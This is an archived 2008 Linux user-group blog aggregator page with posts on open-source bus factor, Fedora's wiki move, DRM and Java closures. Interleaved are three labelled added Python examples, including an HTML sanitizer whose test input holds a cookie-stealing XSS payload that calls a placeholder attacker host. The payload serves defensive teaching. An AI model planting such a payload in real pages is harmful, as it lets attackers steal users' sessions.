Planet NYLUG

May 14, 2008

Rob's Musings

Bus Factor in Open Source Software Development

Leslie Hawthorne posted an interesting thread to the Google Summer of Code Students' List regarding the Bus Factor and the related Single point of failure. It presents a large problem in FOSS development.

She posed the following questions:

1) Do you see the bus factor as a problem in Open Source in general? How about for your project?

2) Do you think that the bottlenecks result from having too few people involved in a project? How do those bottlenecks get resolved if it is hard to bring on newcomers due to bottlenecks?

3) What parallels can you draw between the concept of the bus factor, socially speaking, and reliability engineering?

The best example of how it is a problem in open source is the saga of Hans Reiser, who, as everybody knows, killed his wife. He is the lead developer on ReiserFS. Now, with him in prison, there is a good chance that ReiserFS will slowly die due to his incarceration.

Imagine for a moment if you will, that Linus Torvalds got hit by a bus or something related to that. What would happen to the Linux Kernel? Well, it would probably not die, but it would be a HUGE hit since he is the one who leads the development. Would it die? Probably not. The Bus Factor for linux is pretty low.

As for my Summer of Code project, the Bus Factor would be high, since I am the primary developer.

Applying this socially, every organization is ultimately led by the vision of one person, and usually there are safeties in place to prevent the Bus Factor from even becoming an issue. So this really can't be applied socially in my opinion. BUT if Google were eliminated, Summer of Code would cease to exist. So I suppose it could be applied.

Success and potential failure are usually dependent on one person (or a select few in some cases). Again, referencing Hans Reiser: his project will now most likely fail; it may not, but the probability is high. This is the same across all industries.

Now, does anybody else have answers regarding this topic?

by Robert O'Connor (noreply@blogger.com) at May 14, 2008 05:53 PM
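The bus factor the post talks about is normally estimated from version-control history: how many contributors would have to disappear before most of the code has nobody left who knows it. The following is an added example, not part of Rob's post and not any project's tooling. It implements a simplified greedy variant of the truck-factor heuristic in Python over two constructed commit logs; the author names, file paths, the 50% ownership share and the "more than half the files orphaned" stop rule are all assumptions of the example.

```python
from collections import Counter, defaultdict

# Constructed commit logs, one (author, path) pair per commit. Not real history.
SOLO_PROJECT = [
    ("maria", "src/a.c"), ("maria", "src/b.c"), ("maria", "src/c.c"),
    ("maria", "src/d.c"), ("maria", "src/d.c"), ("ivan", "src/d.c"),
]
SHARED_PROJECT = (
    [("maria", "src/a.c")] * 4 + [("ivan", "src/a.c")]
    + [("maria", "src/b.c")] * 2 + [("ivan", "src/b.c")] * 2
    + [("ivan", "src/c.c")] * 3
    + [("lee", "src/d.c")] * 2
    + [("maria", "src/e.c"), ("lee", "src/e.c")]
    + [("sam", "src/f.c")]
)


def file_owners(commits, share=0.5):
    """Map each file to the set of authors who 'own' it.

    An author owns a file when their commit count on it is at least `share`
    of the top committer's count for that file. This is a deliberately simple
    stand-in (an assumption of this example) for the degree-of-authorship
    scores that real truck-factor estimators compute.
    """
    per_file = defaultdict(Counter)
    for author, path in commits:
        per_file[path][author] += 1
    owners = {}
    for path, counts in per_file.items():
        top = max(counts.values())
        owners[path] = {a for a, n in counts.items() if n >= share * top}
    return owners


def bus_factor(commits, share=0.5, orphan_limit=0.5):
    """Greedy bus-factor estimate.

    Repeatedly remove the author who owns the most not-yet-orphaned files
    (ties broken by name, for determinism) until more than `orphan_limit`
    of all files have no remaining owner. The number of authors removed is
    the estimate: 1 means a single point of failure.
    """
    owners = file_owners(commits, share)
    total = len(owners)
    if total == 0:
        return 0
    removed = set()
    while True:
        # a file is orphaned once every one of its owners has been removed
        orphaned = sum(1 for o in owners.values() if o <= removed)
        if orphaned / total > orphan_limit:
            return len(removed)
        load = Counter()
        for o in owners.values():
            if not o <= removed:
                for author in o - removed:
                    load[author] += 1
        if not load:
            return len(removed)
        victim = min(load, key=lambda a: (-load[a], a))
        removed.add(victim)


if __name__ == "__main__":
    print("solo project bus factor:", bus_factor(SOLO_PROJECT))      # 1
    print("shared project bus factor:", bus_factor(SHARED_PROJECT))  # 3
```

On the constructed solo log, removing one author orphans three of four files, so the estimate is 1; on the shared log it takes three removals. Run against a real `git log --name-only` the same functions give a defensible first number, and the ownership share is the knob that decides how much casual contribution counts as knowledge.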

Random Thoughts of Jon

Coming soon to a browser near you - a new Fedora wiki!

As some of you may know by now (or may not), a new wiki is coming to the Fedora project! Our previous wiki, MoinMoin, has been pretty unreliable due to scalability issues. We were the largest deployment of Moin, and it just didn't scale. You may have noticed this in the form of slow response, frequent timeouts, internal server errors, and other assorted bad things.

The good news is that we've got a replacement now: we're going to the tried and true, battle-tested MediaWiki. There was a conversion script available for Moin, which Mike McGrath modified to fit our needs. Máirín Duffy and Ian Weller did all the template work, and I just sat back and made sure everything I was interested in rendered correctly :).

Now the time has come for everyone else to see that things have rendered OK. There are a few known issues with this incarnation:

1) The license tag at the bottom says CC-BY-SA; this is not correct, we are not relicensing the content. This will be corrected soonish.
2) Where the Art team did banners for various projects, those are replaced by HTML at this point. Those will have to be manually converted to MediaWiki templates. We can no longer allow embedded HTML in the wiki (removing that capability had been on the table for some time; there are inherent security issues in it).

Without further ado, you can testdrive the new wiki here. This is going live soon, like 2-3 weeks soon, so get your feedback in!

by Jon Stanley (noreply@blogger.com) at May 14, 2008 12:40 AM
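The security issue with embedded HTML in a wiki is that any editor can plant script, event-handler attributes or javascript: links that then run in every reader's browser with that reader's wiki session. The following is an added example, not code from the Fedora wiki or from MediaWiki. It shows the shape of the allowlist filter a wiki needs if it keeps any HTML at all, run over a constructed hostile "banner" edit; the tag and attribute allowlist and the evil.example host are assumptions of the example.

```python
import html
from html.parser import HTMLParser

# The allowlist is an assumption of this example; it is not MediaWiki's list.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "code", "pre", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
VOID_TAGS = {"br"}


def safe_href(value):
    """Allow only http(s) URLs and same-site absolute paths. This rejects
    javascript:, data: and vbscript: links and also protocol-relative
    //host links, which a bare 'starts with /' test would let through."""
    v = (value or "").strip().lower()
    return v.startswith(("http://", "https://")) or (v.startswith("/") and not v.startswith("//"))


class Sanitizer(HTMLParser):
    """Rebuild a fragment from allowlisted tags and attributes only.

    Everything else is dropped: script/style elements with their contents,
    unknown tags such as img, every on* event-handler attribute, and unsafe
    hrefs. Text is re-escaped on the way out so it can never reopen markup.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0  # > 0 while inside a dropped script/style element

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return
        kept = ""
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops onclick=, onerror=, style=, ...
            if name == "href" and not safe_href(value):
                continue
            kept += f' {name}="{html.escape(value or "", quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# Constructed hostile banner edit; evil.example is a placeholder host.
EVIL_BANNER = (
    '<p onclick="alert(1)">Welcome</p>'
    '<img src=x onerror="fetch(\'//evil.example/\'+document.cookie)">'
    '<script>document.location="//evil.example"</script>'
    '<a href="javascript:alert(2)">team page</a> 1 &lt; 2'
)

if __name__ == "__main__":
    print(sanitize(EVIL_BANNER))  # <p>Welcome</p><a>team page</a> 1 &lt; 2
```

Allowing raw HTML means the page emits the banner above untouched, and every reader executes the onerror handler. The filter keeps the markup an author legitimately wants (paragraphs, emphasis, plain links) and throws away everything executable, which is why moving banners into MediaWiki templates, rather than re-enabling embedded HTML, is the right fix.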

May 13, 2008

Kees Leune

Security through obscurity

As I write this entry, I am on an intercity train going from Tilburg to Utrecht after a 3 hr meeting. Coming back to my home country after having been away for a while, I always forget how beautiful the country really is. Large open spaces, lots of green, a lot of water and pretty scenery. I have been pretty much up for 29 hours (only slept for 3 hrs or so) and feel fairly jet lagged. Readers who do the West-East crossing regularly can probably identify with how I feel at this point :)

Anyhow; I am in The Netherlands to attend the 2008 SURFnet customer relationship event and I will be presenting the work we are doing on AIRT. AIRT is a web-based platform distributed under the GNU General Public License that aims to assist computer security incident response teams with the bureaucratic aspects of their work. AIRT's goal is to minimize the work on incident administration through automation, allowing handlers to focus on the work that really matters.

What does this have to do with Security through obscurity? Absolutely nothing, but since I was writing a blog entry, I might as well throw in a shameless plug for a project on which I spend a considerable amount of time ;).
The topic of this post is to once more drive the point home that security through obscurity does not work. Most information security professionals know this, but do not really live it. I try to keep as little of my security work confidential as possible; most of the controls that we put in place are easy to detect by scanning anyway. Even if we do practice near-full-disclosure, the bad guy will still want to verify that what we are saying is correct, and he will scan us just for the heck of it. Of course, our security controls should detect that, and we should determine our reaction to the scans before they take place.

What brought this topic on?

Having moved to the United States from Europe (The Netherlands, to be exact; look it up), we have a fairly large collection of DVDs that are now useless. DVDs have a region encoding that prohibits discs authored for one region from being played in a player meant for another region. Presumably the content owner did this to be able to segment the market with different pricing schemes and release schedules. However, the scheme was cooked up before the ubiquity of the Internet and the realization that DRM does not really provide as much value as many people think.

Most DVD players are region-specific by a setting in their software, and through manipulating that software, the region can be changed. Many players will allow you to select your region once, and prohibit you from changing it after the initial choice.

We recently bought a $40 DVD player that was rumored to be region free. In other words, the manufacturer of that DVD player configured it in such a way that it would play DVDs for all regions. Unfortunately, the particular model that we purchased was region 1 locked (the USA is in region 1). Browsing the internet, we found many unlock codes for other model players by the same manufacturer, but nothing worked.

Eventually, I decided to just email the manufacturer's customer service address and ask them how I could change the region code. After all, I already had "No", so it could only get better from that point on.

Much to my surprise, I got an almost immediate response with detailed instructions on how to change the region encoding of our new player. We can now play all our Dutch-spoken DVDs, which is important to us, since we are raising our daughter with two languages.

This manufacturer understood a number of very important lessons:
1. The world is flat. People (consumers!) move around all the time; arbitrarily assigning regions to people is rude, inconsiderate, and flawed.
2. Consumers are demanding. As a consumer, I don't care about why or how. I want something that works when I need it (Availability!). Assigning region codes to discs and players impedes the perceived availability of the content I legally purchased.
3. Consumers are willing to pay for content. Provided that the content is of sufficient quality and reasonably priced, products will sell. Protecting content via DRM techniques is a feeble attempt to prevent market efficiency. It might work in the short run, but it is not sustainable indefinitely.

If you are interested in more details, please contact me.

by Kees at May 13, 2008 09:57 PM
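The scanning point in Kees's post (a scan is cheap, so plan to detect it rather than hope nobody looks) can be made concrete. The following is an added example, not AIRT code and not from the post: a small detector over constructed iptables-style firewall log lines that flags any source hitting many distinct destination ports within a short window. The log format, the hostname, the RFC 5737 documentation addresses and the thresholds are assumptions of the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# iptables LOG target output as syslog writes it. The format, the host "gw"
# and every address below are assumptions of this example; the lines are
# constructed, not captured traffic.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: "
    r".*?SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)"
)

SCANNER = "203.0.113.7"
SAMPLE_LOG = [
    # an ordinary client: a few web requests spread over several minutes
    "May 13 20:58:10 gw kernel: IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=80",
    "May 13 20:58:11 gw kernel: IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.10 PROTO=TCP SPT=51001 DPT=443",
    "May 13 21:05:40 gw kernel: IN=eth0 OUT= SRC=198.51.100.5 DST=192.0.2.10 PROTO=TCP SPT=51002 DPT=80",
    # unrelated kernel noise the parser must skip
    "May 13 21:01:00 gw kernel: eth0: link is up",
] + [
    # one source walking twelve well-known ports in twelve seconds
    f"May 13 21:01:{sec:02d} gw kernel: IN=eth0 OUT= SRC={SCANNER} "
    f"DST=192.0.2.10 PROTO=TCP SPT=40000 DPT={port}"
    for sec, port in enumerate((21, 22, 23, 25, 53, 80, 110, 143, 443, 445, 3306, 8080))
]


def parse_line(line, year=2008):
    """Return (epoch_seconds, src_ip, dst_port), or None for lines that are
    not firewall hits. Syslog timestamps carry no year, so one is supplied."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts.timestamp(), m["src"], int(m["dpt"])


def max_ports_in_window(events, window=60):
    """events: (timestamp, port) pairs from one source. Slide a `window`-second
    span over them and return the largest number of distinct destination
    ports seen in any span. Two pointers keep this linear in the event count."""
    events = sorted(events)
    seen = Counter()
    best = left = 0
    for ts, port in events:
        seen[port] += 1
        while ts - events[left][0] > window:
            old_port = events[left][1]
            seen[old_port] -= 1
            if seen[old_port] == 0:
                del seen[old_port]
            left += 1
        best = max(best, len(seen))
    return best


def find_scanners(lines, window=60, min_ports=10):
    """Map source IP -> distinct-port count for every source that touched at
    least `min_ports` different ports within `window` seconds."""
    per_src = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dpt = parsed
            per_src[src].append((ts, dpt))
    hits = {}
    for src, events in per_src.items():
        n = max_ports_in_window(events, window)
        if n >= min_ports:
            hits[src] = n
    return hits


if __name__ == "__main__":
    for src, n in find_scanners(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {n} distinct ports within 60s")
```

The legitimate client touches two ports and is never reported; the scanning source crosses the threshold within its first ten hits. The point of deciding the window and the threshold up front is the one Kees makes: the reaction to a scan should be settled before the scan arrives, not improvised after it.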

Random Thoughts of Jon

Oracle fail.

Well, I'm being forced against my will by a customer at $DAYJOB to install Oracle Enterprise Linux for them. So I downloaded it, installed it at home this evening, just to kick the tires a little bit before installing for real. So I installed it. The first thing I notice is that Anaconda looks a tad shoddy compared to the real deal. For instance, when installing packages, there's a 'Status:' line at the bottom that's always blank. What is it supposed to tell me the status OF? That wasn't present in the real deal IIRC.

Next, it installs. I login, and find this:

[jstanley@dhcp-137 ~]$ cat /etc/redhat-release
Enterprise Linux Enterprise Linux Server release 5.1 (Carthage)
[jstanley@dhcp-137 ~]$

For something so 'in your face', I'd expect Oracle to be ashamed of themselves. They just seem to have replaced 'Red Hat' with 'Enterprise Linux' without regard to whether or not it made any sort of sense. Same throughout the installer, really, except there they just replaced Red Hat with nothing.

This really seems like quite a shoddy product to me. I've always thought so, and now that I've seen for myself, I KNOW so.

Oh, and by the way - this was the 100th post to this blog. What a pitiful thing to waste it on.

by Jon Stanley (noreply@blogger.com) at May 13, 2008 08:45 PM

Fedora 9 Released!

Fedora 9 is now officially released! You can get the bits, via BitTorrent or via direct download, at http://fedoraproject.org/get-fedora

Some of the features that I'm most excited about:
  • Xorg 1.5
  • FreeIPA
  • Anaconda encryption of the root filesystem
  • Improved NetworkManager
  • KDE4
  • GNOME 2.22
  • Live persistence
  • New GDM
  • Preupgrade
  • Partition resizing via anaconda
  • Upstart
  • And perhaps most importantly, Firefox 3!
Thanks to all the developers, QA, bug triage, art, marketing, websites, documentation, and other numerous groups that made this release happen!

by Jon Stanley (noreply@blogger.com) at May 13, 2008 11:00 AM

May 12, 2008

Code|Beta

Saying farewell to a friend…

Mauricio is a coworker and a friend who is moving to another department within the same company. This move requires him to change not only the way he works but also where he works, since he has to relocate to the US. This is his last week here in Costa Rica and we wanted to say farewell to our pal, and what better way to do it than over a couple of beers with close friends.

Mauricio...

I hope that he has success in his new position and that he doesn’t forget his friends. Have a safe trip :)

The rest of the photos can be viewed by clicking here.

-LM

by Luis Murillo at May 12, 2008 06:53 AM

Random Thoughts of Jon

Brief reminder - Bugzilla maintenance activities

Figured that I would post here what I posted to fedora-devel-announce a few days ago:

As mentioned previously in various announcements about the Bugzilla actions that are being undertaken, we will begin phase 2 shortly. Instructions on how to opt-out of these changes are below, as well as links to wiki pages that contain precise information on when the actions will begin, what actions are to be taken, and the queries used to select bugs to act upon.

1) Close as INSUFFICIENT_DATA all bugs that are still in NEEDINFO from the "stale rawhide" cleanup (http://fedoraproject.org/wiki/BugZappers/F9CleanUp/RunTime#stalephase2). Precautions are being taken to ensure that bugs that had activity but were never taken out of NEEDINFO after the last round of actions are not touched.

OPT-OUT: Changing the status to anything other than NEEDINFO will avoid having the bugs touched.

2) Close all bugs in ANY state that are filed against an EOL version (http://fedoraproject.org/wiki/BugZappers/F9CleanUp/RunTime#eolphase2)

OPT-OUT: Changing the version to '8' or 'rawhide' will avoid us making any changes to this bug.

Note that the following two actions are part of the BugZappers release SOP, and are being undertaken independently of the activities above (and will take place for every subsequent release to ensure that Bugzilla remains in good working order and useful to all parties):

3) Rebase all rawhide bugs (except for those that are Package Reviews or RFE's) to Fedora 9. Note that Bugzilla notification mail will be suppressed for this change - i.e. no one will receive mail that this has occurred except for this one. This is in direct response to community feedback that we were spamming them with unnecessary notifications. (http://fedoraproject.org/wiki/BugZappers/HouseKeeping/Fedora9#frebase)

OPT-OUT: If this is an RFE, then add the FutureFeature keyword to the bug, and no action will be taken on it.

4) Post a warning about the impending end-of-life of Fedora 7 in all bugs filed against F7 (http://fedoraproject.org/wiki/BugZappers/HouseKeeping/Fedora9#f7warning). Paul Frields recently mentioned this, this comment will merely act as a reminder and final warning of this fact. 30 days from the date of this running, all remaining bugs that are opened against Fedora 7 will be CLOSED WONTFIX.

No opt-out really applies to this; however, if the bug still applies to a later release, feel free to change the version to the later release and the comment will not be added.

If you have many bugs to change as a result of these procedures, feel free to drop by #fedora-qa and we will guide you through changing them all at once.

Also note that we have conducted a thorough post-mortem investigation of all the spam that was generated last time, and have identified and repaired the problem. There will be only one notification per bug this time around :).

Rest assured the BugZappers are not doing this on their own; this process has been carefully reviewed by the leadership of the Fedora Community. If you believe this process should be changed, like all things in Fedora, feel free to propose patches to the existing process or create a new proposal which can be evaluated and discussed for the Fedora 10 release cycle.

by Jon Stanley (noreply@blogger.com) at May 12, 2008 12:36 AM

Running for a spot on the Fedora Board

Well, I declared my candidacy on f-a-b earlier, and just yesterday made it official (I guess) with a post on the wiki. So if you can't think of someone better to select, select me! :) There's a number of reasons to do so that are outlined on the wiki page. If someone can suggest patches for that nomination, that's welcome too.

by Jon Stanley (noreply@blogger.com) at May 12, 2008 12:33 AM

May 11, 2008

Rob's Musings

Swinging: BGGA style.

So, to continue with my playing with Java closures, I now present Swing event handling, BGGA style. Again, to compile this you will need the BGGA prototype. You can run it using your installed JRE.

First, I'll show you the Java version:

import javax.swing.JFrame;
import javax.swing.JButton;
import javax.swing.SwingUtilities;
import java.awt.event.ActionListener;
import java.awt.event.ActionEvent;

/**
 * Created: Mar 19, 2008 5:48:43 PM
 *
 * @author Robert O'Connor
 */
public class UsualJavaGui {
    JFrame frame = new JFrame("Usual Java Example");
    JButton button = new JButton("Press me");

    public UsualJavaGui() {
        // Anonymous inner class: the pre-closures way to attach a handler.
        button.addActionListener(new ActionListener() {
            public void actionPerformed(ActionEvent e) {
                System.out.println("Button pressed");
            }
        });
        frame.add(button);
        frame.pack();
        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
        frame.setVisible(true);
    }

    public static void main(String[] args) {
        // Swing components must be created on the event dispatch thread.
        SwingUtilities.invokeLater(new Runnable() {
            public void run() {
                new UsualJavaGui();
            }
        });
    }
}

I think you get the gist of what it does. Now the BGGA version.

import javax.swing.JFrame;
import javax.swing.JButton;
import javax.swing.SwingUtilities;
import java.awt.event.ActionEvent;

/**
 * Created: Mar 19, 2008 7:35:15 PM
 *
 * @author Robert O'Connor
 */
public class BGGAGui {
    JFrame frame = new JFrame("BGGA Frame");
    JButton button = new JButton("Press me");

    public BGGAGui() {
        // BGGA closure literal converted to an ActionListener.
        button.addActionListener({ActionEvent evt => System.out.println("Button pressed");});
        frame.add(button);
        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
        frame.pack();
        frame.setVisible(true);
    }

    public static void main(String[] args) {
        // thanks to neil gafter!
        SwingUtilities.invokeLater({ => new BGGAGui(); });
    }
}

What occurs within addActionListener() is that when you click the button, that closure is invoked; it does the same thing the Java one does (prints "Button pressed" to the screen). I'm not sure how to write the invokeLater() call using BGGA to reduce its verbosity. If anybody knows, could you tell me? When the code is executed, the closure is executed and a frame is displayed; yadda yadda.

by Robert O'Connor (noreply@blogger.com) at May 11, 2008 07:07 PM

Fyndo's musings

Can Free/Open Source Software Innovate

The other day in the bookstore I was leafing through a book, and it made the argument that Free/Open Source software was very good at creating (possibly better) copies of existing programs, but wasn't good at breaking new ground.

Personally, I think this argument is stupid. While Tim Berners-Lee's first WWW browser wasn't released under a "free" license, it wasn't really closed-source either. His announcement said: "If you're interested in using the code, mail me. It's very prototype, but available by anonymous FTP from info.cern.ch. It's copyright CERN but free distribution and use is not normally a problem.", and the (later dominant) NCSA Mosaic was released under an open source/free license. Web servers were similarly free, and honestly, nobody has ever even caught up to Apache and the other free web servers in terms of quality. Netnews was mostly run on free software, as was much of the internet (much of that code from Berkeley). Clearly that was innovation.

CVS (the version control system) was open-source, and was incredibly innovative, and there's been incredible amounts of innovation in that realm by open-source projects. Cfengine (the system management tool) was pretty innovative. Perl. Python. Ruby. Rails. PHP. In games we have nethack/rogue etc (which went on to inspire the creation of Diablo), as well as the many MUDs.

So why do people have this absurd notion that Free Software can't innovate? I can think of a couple reasons. The main one is that FOSS development is greatly affected by communication costs. The simpler sharing your source code is, the easier a distributed development model is. Thus, the amount of Free Software written, and the ease of the Open Source Software development model shot up enormously along with the growth of the internet. So anything that pre-dates the internet wasn't going to be developed as Free Software. So yes, Free spreadsheets/WYSIWYG wordprocessors/etc. are fairly derivative. Proprietary software had a substantial head start. But in internet technologies (especially on the server side) Free software has the lead, since you had the internet available to collaborate over if you were writing an internet server.

I suspect proprietary development also allows more rapid development of mid-sized software, so Netscape got all the fame for the Web, because it was able to step in at the right time and make a better browser than Mosaic quickly. But that doesn't mean it's any more innovative.

And, of course, people think it because it's what Microsoft tells them to think ;)

by Fyndo (noreply@blogger.com) at May 11, 2008 01:01 AM

May 09, 2008

Random Thoughts of Jon

Ordered a new toy yesterday

Yesterday, I broke down and ordered a Thinkpad R61. I had originally planned to go with the T61, but I did some research, and found that really the only difference between the two (I got the 14.1" R61) is that the T61 is slightly thinner and lighter (but not by a huge margin). Both have the LCD roll cage (NOTE: the 15.4" R61 does NOT have the LCD roll cage, whereas the 14.1" model does), they're both built like tanks to withstand my abuse, and it's about $150-$200 cheaper than the T61. The total price of the machine after all the discounts was $958.15, not a bad machine for the price. Yes, I know that Centrino 2 is coming out next month. Having the absolute latest and greatest is not really important to me (except in the operating system realm :) ), and I think I'll really enjoy it and it will last awhile I'm sure. Of course, the included Vista goes bye-bye quickly and gets replaced with F9 :)

So here's what I got (note the 5/22/08 over there, that's the estimated ship date :( ):

1 7732CT CONFIGURED SYSTEM
05/22/08 $958.15 $958.15
42X5952 SBB INTEL CORE2DUO PROC. T9300
42V8012 VBB MS WIN VISTA HOME BASIC
42W7293 SBB MSWINVISTA H-BAS32 US ENG
42V9324 SBB 14.1WXGA +TFT,W/OCAM
42X5956 SBB INTLGMA X3100 GM965W/1394
41W2068 VBB 4GB PC2-5300 667MHZ 2DIMM
42V8195 SBB KEYBOARD US ENGLISH
42W7033 SBB ULTRANAV(TRCKP+TOUCHP) +FINGR
42V8712 SBB 100GB HDD,7200RPM
42V8718 SBB DVDREC.8XMAXDUAL L.ULT.ENH
42V8177 SBB INT.WIRE.WIFI/LINK4965AGN
42V9338 SBB 6 CELL LI-ION BATERRY
41W1787 SBB CPK NORTH AMERICA
42W7087 SBB LP,US ENGLISH

by Jon Stanley (noreply@blogger.com) at May 09, 2008 12:51 PM

May 08, 2008

Random Thoughts of Jon

I'm bankrupt!

What you ask? How am I writing on the blog if I'm liquidating all my assets in order to pay off debts? Not that kind of bankrupt, silly! I'm going to declare laundry bankruptcy this weekend.

I have nothing but a small stackable washer and dryer in my apartment, so doing all of the laundry that has accumulated that doesn't absolutely have to be done is going to take weeks if I were to undertake the entire endeavor.

What, exactly, is a laundry bankruptcy and how does one declare such a thing? Fortunately, there are no costly lawyers involved, nor is your credit tarnished for 7 years. Rather, one feels better immediately after declaring laundry bankruptcy. You know that you're a candidate for laundry bankruptcy when the mountain of laundry in your apartment is taller than you are (no, not really my case, but you get the point). So how does one declare laundry bankruptcy?

The procedures may vary slightly, depending on where you live. The gist of it, though, is a trip to the local laundromat. You can either do the laundry yourself there, or, for a fee, they will generally do the laundry for you and you can pick it up later. After all, is doing umpteen loads of laundry really worth my time and effort? I don't really think so.

After all this is done, I'll probably have enough clean clothes for a year! :)

by Jon Stanley (noreply@blogger.com) at May 08, 2008 11:10 PM

preed's blah-blah-blahg

It's all about the Chases

Maybe I only notice these things because Gerv has so religiously run the "n00,000 Bugzilla bug"-contests...

Or maybe it was randomly running across Wil's post about all of the web team's commits the other day...

Or maybe... it's just because I'm a dork about these sorts of things...

... buuut I was amused to realize the other day that here at the nest, we're due to hit the 10k mark on both bugs (I just filed bug 9087) and commits (changeset 9200 just went in).

I'm betting we'll probably hit 10k on both before 0.6 ships... although, I find myself wondering who will make it across the milestone first. Even though Bugzilla is behind at this point, I'm betting it'll catch up to commits before we ship.

Anyone bets on when we'll hit 20k?

(I was going to ask about the next-order-of-magnitude milestone, but... a Wilson party is probably a couple years away... at least.)

May 08, 2008 07:56 PM

Kees Leune

Essential Truths in Information Security: Understand what you protect

For the last few days, I have been thinking about doing a series of blog posts around the theme Essential Truths in Information Security. In these posts, I will discuss a number of lessons that I learned while working in information security.

Today's truth is: Understand what you protect. For an information security professional to be successful, just understanding how to protect a resource is not enough. A deeper understanding of your organization's assets is at least as important: what are the resources that you are trying to protect? How important are those resources to the organization? What kind of controls are appropriate?

Understanding what you protect requires knowledge about the business side of life. After all, information security is not a goal; it is a means to manage risks to information and to ensure that those risks are at an acceptable level. Who decides what is acceptable and what is not? Most certainly it is not the information security professional; our job is to identify risks and point out what the consequences might be if a risk manifests itself.

We will also suggest how those risks may be mitigated, but in the end, that decision is not up to us. Once the decision has been made, we will work to implement, operate, and monitor information security controls to see how effective they are. More often than not, information security professionals will also coordinate how information security incidents are resolved.

Determining what measures will be taken while responding to an incident is something for which we need the help of "the business". They, not us, know what the impact of containment or eradication actions is.

Understand what you protect

Realize that putting information security controls in place is not a goal, but a means to achieve a business goal. Understand what you protect.

by Kees at May 08, 2008 01:11 PM

May 07, 2008

Code|Beta

Playing with Photoshop

I’ve never been a big fan of Photoshop and the whole "modify the photo after taking the shot" approach, because it really doesn’t make you a good photographer if you’re always fixing up your mistakes after taking the shot instead of working at getting better at getting the shot. But I find that there is always…ok, sometimes…a way to enhance the colors of the photo so that it pops out and doesn’t have a washed-out look.

I recently got the Totally Rad Actions for Adobe Photoshop, as well as Kubota’s actions which I’ve mentioned before. Using them didn’t really cause much change or enhancement to the photo, which made me think that the actions didn’t really apply to my photos, but I later found out that I was actually applying them wrong. Once I got the hang of it I was able to actually enhance the photos and make the colors pop. The bad side of this is that it takes time and patience on photos that have a lot of detail. I took the photo below from the second floor of my house with my Panasonic Lumix DMC-LZ3; in the first shot the colors don’t pop and it looks a bit washed out:

Once I learned to use the actions correctly I applied the “Technicolor Dream World” and after taking the necessary actions I proceeded to apply the “Big Blue” action and also took the necessary steps to activate the action correctly. Once that was done I ended up with the shot below:

The shot looks a lot better and the colors really pop out. What are your opinions and views on the subject?

-LM

by Luis Murillo at May 07, 2008 04:59 PM

Kees Leune

EDUCAUSE/Internet2 Security Professionals Conference

I have spent the last few days at the EDUCAUSE/Internet2 Security Professionals Conference. Of all the conferences that I have attended over the years, this might have been the best. Not only were the logistics very well taken care of (I did not detect many problems), the sessions that I attended were relevant, interesting, and of an acceptable quality.

In addition, I was able to put a face to many of the names that I have seen in the past year, and I have enjoyed it a lot. Attending the conference was definitely worth my time (and my employer's money). Well done, EDUCAUSE!

by Kees at May 07, 2008 01:25 PM

May 06, 2008

Vitaliy

OpenSolaris 2008.05

The first official binary distribution based on OpenSolaris was released yesterday! It comes on a single LiveCD that lets you check out all the much-talked-about features before installing. Some of the highlights are the new IPS package manager, DTrace, the Service Management Facility, Xen, and the new ZFS filesystem!

I have been looking forward to experimenting more with Zones and ZFS (after being very disappointed with the current ZFS implementation on FreeBSD). I downloaded the LiveCD and got ready for the painful Solaris installation. To my surprise, the LiveCD booted to a very attractive GNOME desktop with a GTK2 installer comparable to a desktop-oriented Linux distribution. The installation was quick and painless; it completely blew me away. I highly recommend OpenSolaris to anybody interested in exploring ZFS!

by vitaliy at May 06, 2008 10:17 PM

Code|Beta

Cellphone photography

I had taken these photos some time ago and just found them last night on my cellphone so I uploaded them for everyone to see :)

I really like how they came out…what do you think?



by Luis Murillo at May 06, 2008 09:46 PM

How to Find the Blog Service that’s Right for Your Photoblog

Natalie posted on Digital Photography School or DPS the last post on the three part series to get the DPS community or anyone else that’s interested blogging to show off their photography work. On this last post she asked a couple of the professional photographers about their blogs and where they host them, I guess her e-mail asking me about it got lost in all the spam…no I’m just kidding ;)

You can find her article on the Digital Photography School website and you can go to her blog as well and link from there.

What I do is pretty simple…well, at least for me…I bought a hosting plan with DreamHost, which is pretty cheap compared to other options I’ve seen out there and has really nice specs as far as the package they offer. I installed WordPress using their one-click install system and upgrade the blog through there as well. The theme I use on WordPress is K2, which I love and have done a couple of modifications to so that it does what I need.

For my photos I actually upload them to Flickr, I got the pro account after I hit the 200 photo limit that they have established, and then I installed a plugin called FAlbum on Wordpress so that the visitors to my site can see my photos directly from my blog and not have to go to Flickr, though they can still go to Flickr and comment on the photos there and also download bigger versions of the photos if they wanted to.

My e-mail is actually administered by Google. I got an account on their Google Apps service and they provide the e-mail system, which is the same one they use for Gmail, so I can even chat with my friends who use Google Talk. I love this option; the free version only allows up to 25 e-mail addresses, but that’s ok since it’s really just my girlfriend and myself using it :D

